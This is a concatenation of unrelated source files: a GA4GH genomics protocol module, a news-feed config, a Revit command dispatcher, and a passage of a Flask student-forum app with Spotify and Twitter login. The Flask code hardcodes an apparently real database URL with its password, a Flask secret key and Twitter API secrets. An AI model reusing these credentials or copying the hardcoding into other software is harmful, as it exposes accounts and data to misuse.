from ga4gh._protocol_version import version # noqa
from ga4gh.common_pb2 import * # noqa
from ga4gh.assay_metadata_pb2 import * # noqa
from ga4gh.metadata_pb2 import * # noqa
from ga4gh.metadata_service_pb2 import * # noqa
from ga4gh.read_service_pb2 import * # noqa
from ga4gh.reads_pb2 import * # noqa
from ga4gh.reference_service_pb2 import * # noqa
from ga4gh.references_pb2 import * # noqa
from ga4gh.variant_service_pb2 import * # noqa
from ga4gh.variants_pb2 import * # noqa
from ga4gh.allele_annotations_pb2 import * # noqa
from ga4gh.allele_annotation_service_pb2 import * # noqa
from ga4gh.sequence_annotations_pb2 import * # noqa
from ga4gh.sequence_annotation_service_pb2 import * # noqa
from ga4gh.bio_metadata_pb2 import * # noqa
from ga4gh.bio_metadata_service_pb2 import * # noqa
from ga4gh.genotype_phenotype_pb2 import * # noqa
from ga4gh.genotype_phenotype_service_pb2 import * # noqa
from ga4gh.rna_quantification_pb2 import * # noqa
from ga4gh.rna_quantification_service_pb2 import * # noqa
# A map of response objects to the name of the attribute used to
# store the values returned.
_valueListNameMap = {
SearchVariantSetsResponse: "variant_sets", # noqa
SearchVariantsResponse: "variants", # noqa
SearchDatasetsResponse: "datasets", # noqa
SearchReferenceSetsResponse: "reference_sets", # noqa
SearchReferencesResponse: "references", # noqa
SearchReadGroupSetsResponse: "read_group_sets", # noqa
SearchReadsResponse: "alignments", # noqa
SearchCallSetsResponse: "call_sets", # noqa
SearchVariantAnnotationSetsResponse: "variant_annotation_sets", # noqa
SearchVariantAnnotationsResponse: "variant_annotations", # noqa
SearchFeatureSetsResponse: "feature_sets", # noqa
SearchFeaturesResponse: "features", # noqa
SearchBioSamplesResponse: "biosamples", # noqa
SearchIndividualsResponse: "individuals", # noqa
SearchPhenotypeAssociationSetsResponse: "phenotype_association_sets", # noqa
SearchPhenotypesResponse: "phenotypes", # noqa
SearchGenotypePhenotypeResponse: "associations", # noqa
SearchRnaQuantificationSetsResponse: "rna_quantification_sets", # noqa
SearchRnaQuantificationsResponse: "rna_quantifications", # noqa
SearchExpressionLevelsResponse: "expression_levels", # noqa
}
def getValueListName(protocolResponseClass):
"""
Returns the name of the attribute in the specified protocol class
that is used to hold the values in a search response.
"""
return _valueListNameMap[protocolResponseClass]
def convertDatetime(t):
"""
Converts the specified datetime object into its appropriate protocol
value. This is the number of milliseconds from the epoch.
"""
epoch = datetime.datetime.utcfromtimestamp(0)
delta = t - epoch
millis = delta.total_seconds() * 1000
return int(millis)
def getValueFromValue(value):
"""
Extract the currently set field from a Value structure
"""
if type(value) != struct_pb2.Value:
raise TypeError("Expected a Value, but got {}".format(type(value)))
if value.WhichOneof("kind") is None:
raise AttributeError("Nothing set for {}".format(value))
return getattr(value, value.WhichOneof("kind"))
def toJson(protoObject, indent=None):
"""
Serialises a protobuf object as json
"""
# Using the internal method because this way we can reformat the JSON
js = json_format._MessageToJsonObject(protoObject, True)
return json.dumps(js, indent=indent)
def toJsonDict(protoObject):
"""
Converts a protobuf object to the raw attributes
i.e. a key/value dictionary
"""
return json.loads(toJson(protoObject))
def fromJson(json, protoClass):
"""
Deserialise json into an instance of protobuf class
"""
return json_format.Parse(json, protoClass())
def validate(json, protoClass):
"""
Check that json represents data that could be used to make
a given protobuf class
"""
try:
fromJson(json, protoClass)
# The json conversion automatically validates
return True
except Exception:
return False
class SearchResponseBuilder(object):
"""
A class to allow sequential building of SearchResponse objects.
"""
def __init__(self, responseClass, pageSize, maxBufferSize):
"""
Allocates a new SearchResponseBuilder for the specified
responseClass, user-requested pageSize and the system mandated
maxBufferSize (in bytes). The maxBufferSize is an
approximate limit on the overall length of the serialised
response.
"""
self._responseClass = responseClass
self._pageSize = pageSize
self._maxBufferSize = maxBufferSize
self._numElements = 0
self._nextPageToken = None
self._protoObject = responseClass()
self._valueListName = getValueListName(responseClass)
self._bufferSize = self._protoObject.ByteSize()
def getPageSize(self):
"""
Returns the page size for this SearchResponseBuilder. This is the
user-requested maximum size for the number of elements in the
value list.
"""
return self._pageSize
def getMaxBufferSize(self):
"""
Returns the maximum internal buffer size for responses, which
corresponds to total length (in bytes) of the serialised protobuf
objects. This will always be less than the size of JSON output.
"""
return self._maxBufferSize
def getNextPageToken(self):
"""
Returns the value of the nextPageToken for this
SearchResponseBuilder.
"""
return self._nextPageToken
def setNextPageToken(self, nextPageToken):
"""
Sets the nextPageToken to the specified value.
"""
self._nextPageToken = nextPageToken
def addValue(self, protocolElement):
"""
Appends the specified protocolElement to the value list for this
response.
"""
self._numElements += 1
self._bufferSize += protocolElement.ByteSize()
attr = getattr(self._protoObject, self._valueListName)
obj = attr.add()
obj.CopyFrom(protocolElement)
def isFull(self):
"""
Returns True if the response buffer is full, and False otherwise.
The buffer is full if either (1) the number of items in the value
list is >= pageSize or (2) the total length of the serialised
elements in the page is >= maxBufferSize.
If page_size or max_response_length were not set in the request
then they're not checked.
"""
return (
(self._pageSize > 0 and self._numElements >= self._pageSize) or
(self._bufferSize >= self._maxBufferSize)
)
def getSerializedResponse(self):
"""
Returns a string version of the SearchResponse that has
been built by this SearchResponseBuilder.
"""
self._protoObject.next_page_token = pb.string(self._nextPageToken)
s = toJson(self._protoObject)
return s
def getProtocolClasses(superclass=message.Message):
"""
Returns all the protocol classes that are subclasses of the
specified superclass. Only 'leaf' classes are returned,
corresponding directly to the classes defined in the protocol.
"""
# We keep a manual list of the superclasses that we define here
# so we can filter them out when we're getting the protocol
# classes.
superclasses = set([message.Message])
thisModule = modules[__name__]
subclasses = []
for name, class_ in inspect.getmembers(thisModule):
if ((inspect.isclass(class_) and
issubclass(class_, superclass) and
class_ not in superclasses)):
subclasses.append(class_)
return subclasses
postMethods = \
[('/callsets/search',
SearchCallSetsRequest, # noqa
SearchCallSetsResponse), # noqa
('/datasets/search',
SearchDatasetsRequest, # noqa
SearchDatasetsResponse), # noqa
('/readgroupsets/search',
SearchReadGroupSetsRequest, # noqa
SearchReadGroupSetsResponse), # noqa
('/reads/search',
SearchReadsRequest, # noqa
SearchReadsResponse), # noqa
('/references/search',
SearchReferencesRequest, # noqa
SearchReferencesResponse), # noqa
('/referencesets/search',
SearchReferenceSetsRequest, # noqa
SearchReferenceSetsResponse), # noqa
('/variants/search',
SearchVariantsRequest, # noqa
SearchVariantsResponse), # noqa
('/datasets/search',
SearchDatasetsRequest, # noqa
SearchDatasetsResponse), # noqa
('/callsets/search',
SearchCallSetsRequest, # noqa
SearchCallSetsResponse), # noqa
('/featuresets/search',
SearchFeatureSetsRequest, # noqa
SearchFeatureSetsResponse), # noqa
('/features/search',
SearchFeaturesRequest, # noqa
SearchFeaturesResponse), # noqa
('/variantsets/search',
SearchVariantSetsRequest, # noqa
SearchVariantSetsResponse), # noqa
('/variantannotations/search',
SearchVariantAnnotationsRequest, # noqa
SearchVariantAnnotationSetsResponse), # noqa
('/variantannotationsets/search',
SearchVariantAnnotationSetsRequest, # noqa
SearchVariantAnnotationSetsResponse), # noqa
('/rnaquantificationsets/search',
SearchRnaQuantificationSetsRequest, # noqa
SearchRnaQuantificationSetsResponse), # noqa
('/rnaquantifications/search',
SearchRnaQuantificationsRequest, # noqa
SearchRnaQuantificationsResponse), # noqa
('/expressionlevels/search',
SearchExpressionLevelsRequest, # noqa
SearchExpressionLevelsResponse)] # noqa
| ga4ghpoc/server | ga4gh/protocol.py | protocol.py | py | 10,280 | python | en | code | null | github-code | 36 |
21907570627 | diccionario = {"telam": {"ultimas": "http://www.telam.com.ar/rss2/ultimasnoticias.xml",
"politica": "http://www.telam.com.ar/rss2/politica.xml",
"sociedad": "http://www.telam.com.ar/rss2/sociedad.xml",
"economia": "http://www.telam.com.ar/rss2/economia.xml",
"mundo": "http://www.telam.com.ar/rss2/internacional.xml"},
"clarin": {"ultimas": "http://www.clarin.com/rss/lo-ultimo/",
"politica": "http://www.clarin.com/rss/politica/",
"sociedad": "http://www.clarin.com/rss/sociedad/",
"economia": "http://www.clarin.com/rss/ieco/",
"mundo": "http://www.clarin.com/rss/mundo/"},
"la-voz": {"ultimas": "http://www.lavoz.com.ar/rss.xml",
"politica": "http://www.lavoz.com.ar/taxonomy/term/4/1/feed",
"sociedad": "http://www.lavoz.com.ar/taxonomy/term/6/1/feed",
"economia": "http://www.lavoz.com.ar/taxonomy/term/2/1/feed",
"mundo": "http://www.lavoz.com.ar/taxonomy/term/5/1/feed"},
"mendoza-online": {"ultimas": "http://www.mdzol.com/files/rss/todoslostitulos.xml",
"politica": "http://www.mdzol.com/files/rss/politica.xml",
"sociedad": "http://www.mdzol.com/files/rss/sociedad.xml",
"economia": "http://www.mdzol.com/files/rss/economia.xml",
"mundo": "http://www.mdzol.com/files/rss/mundo.xml"},
"el-litoral": {"ultimas": "http://www.ellitoral.com/rss/um.xml",
"politica": "http://www.ellitoral.com/rss/poli.xml",
"sociedad": "http://www.ellitoral.com/rss/suce.xml",
"economia": "http://www.ellitoral.com/rss/econ.xml",
"mundo": "http://www.ellitoral.com/rss/inte.xml"}
}
lista_medios = ['clarin', 'el-litoral', 'la-voz', 'mendoza-online', 'telam']
lista_secciones = ['ultimas', 'politica', 'sociedad', 'economia', 'mundo']
claves_medios = {"clarin": "1", "el-litoral": "2", "la-voz": "3", "mendoza-online": "4", "telam": "5"}
claves_secciones = {"ultimas": "1", "politica": "2", "sociedad": "3", "economia": "4", "mundo": "5"}
claves_medios_invertido = {"1": "clarin", "2": "el-litoral", "3": "la-voz", "4": "mendoza-online", "5": "telam"}
claves_secciones_invertido = {"1": "ultimas", "2": "politica", "3": "sociedad", "4": "economia", "5": "mundo"}
meses = {"Jan": 1, "Feb": 2, "Mar": 3, "Apr": 4, "May": 5, "Jun": 6, "Jul": 7, "Aug": 8, "Sep": 9, "Oct": 10, "Nov": 11,
"Dec": 12}
| alvarezfmb/edd-untref | TP/TP-2-Alvarez-Buljubasic-Rombola/tp2/config.py | config.py | py | 2,833 | python | en | code | 0 | github-code | 36 |
12338761878 | ################011011100110010101101111####
### neo Command Line #######################
############################################
def getcmdlist():
cmds = {
"f" :"Find And Replace : Find and replace in family parameters.",
"froxl" :"Family Replacer : Open Excel file.",
"frp" :"Family Replacer : in Project : Replace family and types of instances edited in Excel.",
"frv" :"Family Replacer : in ActiveView : Replace family and types of instances edited in Excel."
}
return cmds
def runcmd(cmd, msg, recallCL=False):
if cmd == 'f':
from lib.find import neo_findreplace_main as find
find.Main()
elif cmd == 'froxl':
from lib.xl import neo_xl_type_replacer as tyrep
tyrep.GetWb()
elif cmd == 'frp':
from lib.xl import neo_xl_type_replacer as tyrep
tyrep.ImportXl("Project")
elif cmd == 'frv':
from lib.xl import neo_xl_type_replacer as tyrep
tyrep.ImportXl("ActiveView")
else:
from neocl import unknowncmd
unknowncmd(cmd, recallCL, getcmdlist()) | 0neo/pyRevit.neoCL | neoCL.extension/neocl_f.py | neocl_f.py | py | 1,152 | python | en | code | 7 | github-code | 36 |
35941618047 | from flask import Flask, render_template, url_for, flash, redirect, request, session, make_response
from flask_wtf.file import FileField, FileAllowed
from flask_sqlalchemy import SQLAlchemy
from datetime import datetime
from flask_bcrypt import Bcrypt
from flask_wtf import FlaskForm
from wtforms import StringField, PasswordField, SubmitField, BooleanField, TextAreaField
from wtforms.validators import DataRequired, Length, ValidationError, EqualTo, Email
from flask_login import LoginManager, UserMixin, login_user, current_user, logout_user, login_required
from PIL import Image
import re
import secrets
import os
from flask import Flask, redirect, url_for
import time
import requests
import json
import pandas as pd
import folium
import urllib.parse
from requests_oauthlib import OAuth1
import tweepy
app = Flask(__name__)
# this is the serects numbers
app.config['SECRET_KEY'] = 'ea7b11f0714027a81e7f81404612d80d'
# how to add the
# DB_URL = 'postgresql+psycopg2://jasonjia:227006636@csce-315-db.engr.tamu.edu/SILT_DB'.format(user=POSTGRES_USER,pw=POSTGRES_PW,url=POSTGRES_URL,db=POSTGRES_DB)
# DB_URL1 = 'postgresql://jasonjia:227006636@csce-315-db.engr.tamu.edu:5432/SILT_DB_test'
DB_URL1 = 'postgresql://doadmin:jglyvd028l8ced6h@db-silt-db-do-user-8284135-0.b.db.ondigitalocean.com:25060/defaultdb'
app.config['SQLALCHEMY_DATABASE_URI']=DB_URL1
app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False # silence the deprecation warning
db = SQLAlchemy(app)
bcrypt = Bcrypt(app)
login_manager = LoginManager(app)
login_manager.login_view = 'login'
# bootstrap color
login_manager.login_message_category = 'info'
@login_manager.user_loader
def load_user(user_id):
return User.query.get(int(user_id))
class User(db.Model, UserMixin):
id = db.Column(db.Integer, primary_key = True)
email = db.Column(db.String(180), unique = True, nullable = False)
twitter_username = db.Column(db.String(50), unique=True, default = None)
username = db.Column(db.String(30), unique = True, nullable = False)
password = db.Column(db.String(), nullable = False)
user_pic = db.Column(db.String(20), nullable = False, default='default.jpg')
posts = db.relationship('Post', backref='author', lazy = True)
posts_ac = db.relationship('Post_ac', backref='author', lazy = True)
post_h = db.relationship('Post_h', backref='author', lazy = True)
post_sp = db.relationship('Post_sp', backref='author', lazy = True)
post_cr = db.relationship('Post_cr', backref='author', lazy = True)
post_ev = db.relationship('Post_ev', backref='author', lazy = True)
spotifyartist = db.relationship('SpotifyArtist', backref='author', lazy = True)
def __init__(self, email, username, password):
self.email = email
self.username = username
self.password = password
def __repr__ (self):
return f"User('{self.username}', '{self.email}', '{self.user_pic}', '{self.id}')"
class Post(db.Model):
id = db.Column(db.Integer, primary_key = True)
title = db.Column(db.String(50), nullable = False)
post_time = db.Column(db.DateTime, nullable = False, default=datetime.utcnow)
content = db.Column(db.String, nullable = False)
user_id = db.Column(db.Integer, db.ForeignKey('user.id'), nullable=False)
def __repr__(self):
return f"Post('{self.tile}', '{self.post_time}', '{self.content}')"
class Post_ac(db.Model):
id = db.Column(db.Integer, primary_key = True)
title = db.Column(db.String(50), nullable = False)
post_time = db.Column(db.DateTime, nullable = False, default=datetime.utcnow)
content = db.Column(db.String, nullable = False)
user_id = db.Column(db.Integer, db.ForeignKey('user.id'), nullable=False)
def __repr__(self):
return f"Post('{self.tile}', '{self.post_time}', '{self.content}')"
class Post_h(db.Model):
id = db.Column(db.Integer, primary_key = True)
title = db.Column(db.String(50), nullable = False)
post_time = db.Column(db.DateTime, nullable = False, default=datetime.utcnow)
content = db.Column(db.String, nullable = False)
user_id = db.Column(db.Integer, db.ForeignKey('user.id'), nullable=False)
def __repr__(self):
return f"Post('{self.tile}', '{self.post_time}', '{self.content}')"
class Post_sp(db.Model):
id = db.Column(db.Integer, primary_key = True)
title = db.Column(db.String(50), nullable = False)
post_time = db.Column(db.DateTime, nullable = False, default=datetime.utcnow)
content = db.Column(db.String, nullable = False)
user_id = db.Column(db.Integer, db.ForeignKey('user.id'), nullable=False)
def __repr__(self):
return f"Post('{self.tile}', '{self.post_time}', '{self.content}')"
class Post_cr(db.Model):
id = db.Column(db.Integer, primary_key = True)
title = db.Column(db.String(50), nullable = False)
post_time = db.Column(db.DateTime, nullable = False, default=datetime.utcnow)
content = db.Column(db.String, nullable = False)
user_id = db.Column(db.Integer, db.ForeignKey('user.id'), nullable=False)
def __repr__(self):
return f"Post('{self.tile}', '{self.post_time}', '{self.content}')"
class Post_ev(db.Model):
id = db.Column(db.Integer, primary_key = True)
title = db.Column(db.String(50), nullable = False)
post_time = db.Column(db.DateTime, nullable = False, default=datetime.utcnow)
content = db.Column(db.String, nullable = False)
user_id = db.Column(db.Integer, db.ForeignKey('user.id'), nullable=False)
def __repr__(self):
return f"Post('{self.tile}', '{self.post_time}', '{self.content}')"
class SpotifyArtist(db.Model):
id = db.Column(db.Integer, primary_key=True)
user_id = db.Column(db.Integer, db.ForeignKey('user.id'), nullable=False)
artist_name = db.Column(db.String(2000), nullable=False)
artist_id = db.Column(db.String(2000), nullable=False)
# time_range = db.Column(db.String(15), nullable=False)
def __repr__(self):
return f"SpotifyArtist('{self.artist_name}', '{self.artist_id}')"
# do not change this
# from form import account, LoginForm, update_account, PostForm, spotify_profile
####################
## FORMS ##
####################
class account(FlaskForm):
# user name not null and not too long. Add validation
username = StringField('Username', validators=[DataRequired(), Length(min = 2, max = 30)])
email = StringField('Email', validators=[DataRequired(), Length(min = 6), Email()])
password = PasswordField('Password', validators=[DataRequired()])
confirmed_password = PasswordField('Confirm Password', validators=[DataRequired(), EqualTo('password')])
submit = SubmitField('Sign Up')
# def tamu_email_validate(self, form, field):
# # [A-Za-z0-9] firt character to match it.
# if not re.search(r"^[A-Za-z0-9](\.?[a-z0-9]){5,}@tamu\.edu$", field.data):
# raise ValidationError("Invalid Email Address")
# return True
# def validate_email(self, email):
# # [A-Za-z0-9] firt character to match it.
# if not re.search(r"^[A-Za-z0-9](\.?[a-z0-9]){5,}@tamu\.edu$", field.data):
# raise ValidationError("Invalid Email Address")
# # return True
def validate_username(self, username):
user = User.query.filter_by(username=username.data).first()
if user:
raise ValidationError('Username is taken, Please choose a new one')
def validate_email(self, email):
email = User.query.filter_by(email=email.data).first()
if email:
raise ValidationError('Email is taken, Please choose a new one')
# if not re.search(r"^[A-Za-z0-9](\.?[a-z0-9]){5,}@tamu\.edu$", email):
# raise ValidationError("Invalid Email Address")
class LoginForm(FlaskForm):
email = StringField('Email', validators=[DataRequired(), Length(min = 6)])
password = PasswordField('Password', validators=[DataRequired()])
remeber = BooleanField('Remember Me')
submit = SubmitField('Login')
class update_account(FlaskForm):
# user name not null and not too long. Add validation
username = StringField('Username', validators=[DataRequired(), Length(min = 2, max = 30)])
email = StringField('Email', validators=[DataRequired(), Length(min = 6), Email()])
picture = FileField('Update Your Picture', validators=[FileAllowed(['jpg', 'png'])])
submit = SubmitField('Update')
def validate_username(self, username):
if username.data != current_user.username:
user = User.query.filter_by(username=username.data).first()
if user:
raise ValidationError('Username is taken, Please choose a new one')
def validate_email(self, email):
if email.data != current_user.email:
email = User.query.filter_by(email=email.data).first()
if email:
raise ValidationError('Email is taken, Please choose a new one')
class PostForm(FlaskForm):
title = StringField('Title', validators=[DataRequired()])
content = TextAreaField('Content', validators=[DataRequired()])
submit = SubmitField('Post')
tweet = BooleanField('Post On Twitter')
class spotify_profile(FlaskForm):
artist_name = StringField('Artist', validators=[DataRequired()])
artist_id = StringField('Artist_ID', validators=[DataRequired()])
# time_range = StringField('time_range')
########################
## END FORMS ##
########################
@app.route("/", methods=['GET', 'POST'])
@app.route("/home", methods=['GET', 'POST'])
# in terminal:
# debug mode in flask: export FLASK_DEBUG=1
# run flask: flask run
def home():
posts = Post.query.all()
return render_template("home.html", posts=posts)
# @app.route("/funny")
# def funny():
# return render_template("funny.html")
#
#
@app.route("/Events", methods=['GET', 'POST'])
def eve():
posts_ev = Post_ev.query.all()
return render_template("Events.html", posts=posts_ev)
@app.route("/funny", methods=['GET', 'POST'])
def fun():
posts_h = Post_h.query.all()
return render_template("funny.html", posts= posts_h)
@app.route("/studyLounge", methods=['GET', 'POST'])
def study_lounge():
posts_ac = Post_ac.query.all()
return render_template("studylounge.html", posts = posts_ac)
@app.route("/sports", methods=['GET', 'POST'])
def sports():
posts_sp = Post_sp.query.all()
return render_template("sports.html", posts = posts_sp)
@app.route("/course", methods=['GET', 'POST'])
def course():
posts_cr = Post_cr.query.all()
return render_template("course.html", posts = posts_cr)
@app.route('/profile/<username>')
def user_profile(username):
# data we query
# dbArtists = SpotifyArtist.query.filter_by(user_id = current_user.id).first()
data = User.query.filter_by(username = username).first()
spotify_data = SpotifyArtist.query.filter_by(user_id = data.id).first()
print (spotify_data)
# print ((data))
artistArr = []
if (spotify_data != None):
if (len(spotify_data.artist_name.split(',! ')) == 31):
artistArr = spotify_data.artist_name.split(',! ')[20:-1]
print(artistArr)
# return render_template("user_profile.html", posts=data, art = spotify_data)
return render_template("user_profile.html", posts=data, art=artistArr, len=len(artistArr))
return str(username)
@app.route("/resources")
def resources():
return render_template("resources.html")
def save_image(form_picture):
random_h = secrets.token_hex(8)
_, fext = os.path.splitext(form_picture.filename)
picture_fn = random_h + fext
# root path attrinbute
picture_path = os.path.join(app.root_path, 'static/image', picture_fn)
output_size = (125,125)
i = Image.open(form_picture)
i.thumbnail(output_size)
i.save(picture_path)
return picture_fn
@app.route("/profile", methods = ['GET', 'POST'])
@login_required
def profile(artists=[], artist_ids=[]):
time_range = ['short_term', 'medium_term', 'long_term']
leng = 0
print(artists)
if (len(artists) != 0):
# going to be 3
artists_string = ""
artists_id_string = ""
time_range_string = ""
for i in range(len(artists)):
for j in range(len(artists[0])):
# artists[i][j], artist_ids[i][j]
artists_string+=artists[i][j]
artists_string+=",! "
artists_id_string+=artist_ids[i][j]
artists_id_string+=", "
print(artists_string)
print(artists_id_string)
spo = SpotifyArtist(artist_name = artists_string, artist_id = artists_id_string, author=current_user)
db.session.add(spo)
db.session.commit()
# how can we save it to a online drive???
#image_file = 'https://i.pinimg.com/originals/0c/3b/3a/0c3b3adb1a7530892e55ef36d3be6cb8.png'
form = update_account()
if form.validate_on_submit():
if form.picture.data:
pic_file = save_image(form.picture.data)
current_user.user_pic = pic_file
current_user.username = form.username.data
current_user.email = form.email.data
db.session.commit()
flash('You account is updated! ', 'success')
return redirect(url_for('profile'))
elif request.method == 'GET':
form.username.data = current_user.username
form.email.data = current_user.email
image_file = url_for('static', filename = 'image/' + current_user.user_pic, width=100)
dbArtists = SpotifyArtist.query.filter_by(user_id = current_user.id).first()
print("dbArtists:", dbArtists)
# return render_template("home.html", posts=posts)
artistArr = []
if (dbArtists != None):
if (len(dbArtists.artist_name.split(',! ')) == 31):
artistArr = dbArtists.artist_name.split(',! ')[20:-1]
print(artistArr)
return render_template("profile.html", title='Profile', image_file = image_file, form = form, leng=len(artistArr), posts=artistArr)
@app.route("/register", methods=['GET','POST'])
def register():
if current_user.is_authenticated:
return redirect(url_for('home'))
form = account()
if form.validate_on_submit():
# hash the paswword to save to our database
hashed_password = bcrypt.generate_password_hash(form.password.data).decode('utf-8')
# create a new user
user= User(username = form.username.data, email = form.email.data, password = hashed_password)
db.session.add(user)
db.session.commit()
flash(f'Account created! You can now log in! ','success')
# we also need to redirect user to home page
return redirect(url_for('login'))
return render_template('register.html', title = 'Register', form = form)
@app.route("/login", methods = ['GET', 'POST'])
def login():
if current_user.is_authenticated:
return redirect(url_for('home'))
form = LoginForm()
if form.validate_on_submit():
user = User.query.filter_by(email = form.email.data).first()
if user and bcrypt.check_password_hash(user.password, form.password.data):
login_user(user, remember = form.remeber.data)
next_page = request.args.get('next')
# special python return
return redirect(next_page) if next_page else redirect(url_for('home'))
else:
flash('Login not successful. Please check your password and email.', 'danger')
return render_template('login.html', title = 'Login', form = form)
@app.route("/logout")
def logout():
logout_user()
return redirect(url_for('home'))
gloabal_true = False
@app.route("/post/new", methods=['GET', 'POST'])
@login_required
def new_post():
form = PostForm()
# and form.tweet.data == True
if gloabal_true == True:
twitter_consumer_key = "bw5c7K2tzsceOlgenVFDRnogU"
twitter_consumer_secret = "CTXbMs9vFwFCdYrM2CGkVsSsLl53LpO43FNeAwTcX5zukDg36m"
token_url = 'https://api.twitter.com/1.1/statuses/update.json'
token_secret = (session["twitter_secret"])
access_token = (session["twitter_token"])
print ("Auth: ")
print(access_token, token_secret)
if form.tweet.data == True:
print ("it is true")
auth = tweepy.OAuthHandler(twitter_consumer_key, twitter_consumer_secret)
auth.set_access_token(access_token, token_secret)
# Create API object
api = tweepy.API(auth)
# Create a tweet
api.update_status(form.content.data)
# post_response = requests.post(resource_url, auth=tw, data=body)
# post_response = requests.post(request_url, auth = tw)
# body = {'code': code, 'redirect_uri': redirect_uri, 'grant_type': 'authorization_code', 'client_id': CLI_ID, 'client_secret': CLI_SEC}
if form.validate_on_submit():
post = Post(title=form.title.data, content=form.content.data, author=current_user)
db.session.add(post)
db.session.commit()
flash('Your post has been created', 'success')
return redirect(url_for('home'))
return render_template('create_post.html', title = 'Forum', form = form)
@app.route("/post/new/ac", methods=['GET', 'POST'])
@login_required
def new_post_ac():
form = PostForm()
# and form.tweet.data == True
if form.tweet == True:
flash("make a tweet",'success')
if form.validate_on_submit():
post = Post_ac(title=form.title.data, content=form.content.data, author=current_user)
print (request.form.get('mycheckbox'))
db.session.add(post)
db.session.commit()
flash('Your post has been created', 'success')
return redirect(url_for('home'))
return render_template('create_post.html', title = 'Forum', form = form)
@app.route("/post/new/h", methods=['GET', 'POST'])
@login_required
def new_post_h():
form = PostForm()
# and form.tweet.data == True
if form.tweet == True:
flash("make a tweet",'success')
if form.validate_on_submit():
post = Post_h(title=form.title.data, content=form.content.data, author=current_user)
print (request.form.get('mycheckbox'))
db.session.add(post)
db.session.commit()
flash('Your post has been created', 'success')
return redirect(url_for('home'))
return render_template('create_post.html', title = 'Forum', form = form)
@app.route("/post/new/sp", methods=['GET', 'POST'])
@login_required
def new_post_sp():
form = PostForm()
# and form.tweet.data == True
if form.tweet == True:
flash("make a tweet",'success')
if form.validate_on_submit():
post = Post_sp(title=form.title.data, content=form.content.data, author=current_user)
print (request.form.get('mycheckbox'))
db.session.add(post)
db.session.commit()
flash('Your post has been created', 'success')
return redirect(url_for('home'))
return render_template('create_post.html', title = 'Forum', form = form)
@app.route("/post/new/ev", methods=['GET', 'POST'])
@login_required
def new_post_ev():
form = PostForm()
# and form.tweet.data == True
if form.tweet == True:
flash("make a tweet",'success')
if form.validate_on_submit():
post = Post_ev(title=form.title.data, content=form.content.data, author=current_user)
print (request.form.get('mycheckbox'))
db.session.add(post)
db.session.commit()
flash('Your post has been created', 'success')
return redirect(url_for('home'))
return render_template('create_post.html', title = 'Forum', form = form)
@app.route("/post/new/cr", methods=['GET', 'POST'])
@login_required
def new_post_cr():
form = PostForm()
# and form.tweet.data == True
if form.tweet == True:
flash("make a tweet",'success')
if form.validate_on_submit():
post = Post_cr(title=form.title.data, content=form.content.data, author=current_user)
print (request.form.get('mycheckbox'))
db.session.add(post)
db.session.commit()
flash('Your post has been created', 'success')
return redirect(url_for('home'))
return render_template('create_post.html', title = 'Forum', form = form)
# oauth = OAuth(app)
#
# twitter = oauth.remote_app('twitter',
# consumer_key = 'bw5c7K2tzsceOlgenVFDRnogU',
# consumer_secret='CTXbMs9vFwFCdYrM2CGkVsSsLl53LpO43FNeAwTcX5zukDg36m',
# base_url='https://api.twitter.com/1.1/',
# request_token_url='https://api.twitter.com/oauth/request_token',
# access_token_url='https://api.twitter.com/oauth/access_toke',
# authorize_url='https://api.twitter.com/oauth/authorize'
# )
# DELETE this
@app.route('/twitter_login')
def twitterPostForRequestToken():
request_url = 'https://api.twitter.com/oauth/request_token'
# authorization = app.config['AUTHORIZATION']
twitter_redirect_url = "http%3A%2F%2Fsilt-tamu.herokuapp.com%2Ftwitter_callback"
# oauth_callback="http%3A%2F%2Fmyapp.com%3A3005%2Ftwitter%2Fprocess_callback"
# headers = {'Authorization': authorization, 'Accept': 'application/json', 'Content-Type': 'application/x-www-form-urlencoded'}
#headers = {'Accept': 'application/json', 'Content-Type': 'application/x-www-form-urlencoded'}
twitter_consumer_key = "bw5c7K2tzsceOlgenVFDRnogU"
twitter_consumer_secret = "CTXbMs9vFwFCdYrM2CGkVsSsLl53LpO43FNeAwTcX5zukDg36m"
tw = OAuth1(twitter_consumer_key, twitter_consumer_secret)
headers = {'oauth_callback': twitter_redirect_url, 'oauth_consumer_key': twitter_consumer_key}
#body = {'code': code, 'redirect_uri': redirect_uri, 'grant_type': 'authorization_code', 'client_id': CLI_ID, 'client_secret': CLI_SEC}
post_response = requests.post(request_url, auth = tw)
# print("Twitter Post Response:")
attrs = vars(post_response)
twitter_oauth = attrs.get('_content')
oauth_arr = str(twitter_oauth)[2:].split('&')
# oauth_token = oauth_arr[0].split('=')[1]
# oauth_token_secret = oauth_arr[1].split('=')[1]
oauth_token = oauth_arr[0]
oauth_token_secret = oauth_arr[1]
# print (oauth_token)
# print (oauth_token_secret)
authorize_url = "https://api.twitter.com/oauth/authorize?" + oauth_token
return redirect(authorize_url)
# 200 code indicates access token was properly granted
# if post_response.status_code == 200:
# json = post_response.json()
# return json['access_token'], json['refresh_token'], json['expires_in']
# else:
# print("LOGGING: " + 'getToken:' + str(post_response.status_code))
# # logging.error('getToken:' + str(post_response.status_code))
# return None
# https://yourCallbackUrl.com?oauth_token=NPcudxy0yU5T3tBzho7iCotZ3cnetKwcTIRlX0iwRl0&oauth_verifier=uw7NjWHT6OJ1MpJOXsHfNxoAhPKpgI8BlYDhxEjIBY
@app.route('/twitter_callback')
def twitter_callback():
url_parse = request.url
parse_arr = url_parse.split('=')[1:]
token = parse_arr[0].split('&')[0]
verifier = parse_arr[1]
# print (token, verifier)
request_url = 'https://api.twitter.com/oauth/access_token'
# authorization = app.config['AUTHORIZATION']
# twitter_redirect_url = "http%3A%2F%2F127.0.0.1%3A5000%2Ftwitter_callback"
# oauth_callback="http%3A%2F%2Fmyapp.com%3A3005%2Ftwitter%2Fprocess_callback"
# headers = {'Authorization': authorization, 'Accept': 'application/json', 'Content-Type': 'application/x-www-form-urlencoded'}
#headers = {'Accept': 'application/json', 'Content-Type': 'application/x-www-form-urlencoded'}
twitter_consumer_key = "bw5c7K2tzsceOlgenVFDRnogU"
twitter_consumer_secret = "CTXbMs9vFwFCdYrM2CGkVsSsLl53LpO43FNeAwTcX5zukDg36m"
# oauth = OAuth1(client_key,
# client_secret=client_secret,
# resource_owner_key=resource_owner_key,
# resource_owner_secret=resource_owner_secret,
# verifier=verifier)
tw = OAuth1(twitter_consumer_key, client_secret=twitter_consumer_secret, resource_owner_key=token, verifier=verifier)
post_response = requests.post(request_url, auth = tw)
attrs = vars(post_response)
# print (attrs)
twitter_oauth = attrs.get('_content')
# print ("Content: ")
# print (twitter_oauth)
oauth_arr = str(twitter_oauth)[2:].split('&')
# oauth_token = oauth_arr[0].split('=')[1]
